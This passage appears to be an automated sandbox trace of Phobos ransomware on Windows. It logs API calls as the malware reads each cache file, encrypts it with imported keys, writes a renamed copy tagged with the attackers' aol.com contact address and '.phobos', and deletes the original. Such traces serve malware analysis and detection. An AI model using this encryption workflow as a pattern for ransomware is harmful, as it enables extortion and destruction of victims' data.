(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.014] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=292) returned 1 [0197.014] CloseHandle (hObject=0x170) returned 1 [0197.014] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d")) returned 0x2024 [0197.014] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.014] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.014] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0197.015] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0197.015] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.015] ReadFile (in: hFile=0x170, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x124, lpOverlapped=0x0) returned 1 [0197.016] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x130, dwBufLen=0x130 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x130) returned 1 [0197.016] WriteFile (in: hFile=0x16c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x130, lpOverlapped=0x0) returned 1 [0197.016] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329a8) returned 1 [0197.016] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.016] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0197.016] CryptDestroyKey (hKey=0xa329a8) returned 1 [0197.016] WriteFile (in: hFile=0x16c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0197.017] CryptDestroyKey (hKey=0xa32b68) returned 1 [0197.017] CloseHandle (hObject=0x170) returned 1 [0197.017] CloseHandle (hObject=0x16c) returned 1 [0197.017] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d")) returned 1 [0197.018] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0197.018] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=220) returned 1 [0197.018] CloseHandle (hObject=0x16c) returned 1 [0197.018] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d")) returned 0x2024 [0197.019] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0197.019] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.019] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.019] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0197.019] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.019] ReadFile (in: hFile=0x16c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xdc, lpOverlapped=0x0) returned 1 [0197.080] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe0, dwBufLen=0xe0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe0) returned 1 [0197.080] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe0, lpOverlapped=0x0) returned 1 [0197.080] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ce8) returned 1 [0197.081] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.081] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0197.081] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0197.081] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0197.081] CryptDestroyKey (hKey=0xa32b68) returned 1 [0197.081] CloseHandle (hObject=0x16c) returned 1 [0197.081] CloseHandle (hObject=0x170) returned 1 [0197.081] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d")) returned 1 [0197.083] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.084] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=394) returned 1 [0197.084] CloseHandle (hObject=0x140) returned 1 [0197.084] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d")) returned 0x2024 [0197.084] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.084] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.084] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.085] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa329e8) returned 1 [0197.085] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.085] ReadFile (in: hFile=0x140, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x18a, lpOverlapped=0x0) returned 1 [0197.086] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190, dwBufLen=0x190 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190) returned 1 [0197.086] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x190, lpOverlapped=0x0) returned 1 [0197.087] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32b68) returned 1 [0197.087] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.087] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.087] CryptDestroyKey (hKey=0xa32b68) returned 1 [0197.087] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.087] CryptDestroyKey (hKey=0xa329e8) returned 1 [0197.087] CloseHandle (hObject=0x140) returned 1 [0197.087] CloseHandle (hObject=0x170) returned 1 [0197.087] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d")) returned 1 [0197.089] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.090] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=400) returned 1 [0197.090] CloseHandle (hObject=0x170) returned 1 [0197.090] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1")) returned 0x2024 [0197.091] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.091] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.091] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.092] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa329e8) returned 1 [0197.092] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.092] ReadFile (in: hFile=0x170, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x190, lpOverlapped=0x0) returned 1 [0197.093] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a0) returned 1 [0197.093] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1a0, lpOverlapped=0x0) returned 1 [0197.094] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32b68) returned 1 [0197.094] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.094] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.094] CryptDestroyKey (hKey=0xa32b68) returned 1 [0197.094] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.094] CryptDestroyKey (hKey=0xa329e8) returned 1 [0197.094] CloseHandle (hObject=0x170) returned 1 [0197.094] CloseHandle (hObject=0x140) returned 1 [0197.094] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1")) returned 1 [0197.095] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.104] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=430) returned 1 [0197.104] CloseHandle (hObject=0x140) returned 1 [0197.104] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398")) returned 0x2024 [0197.104] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.105] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.105] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: 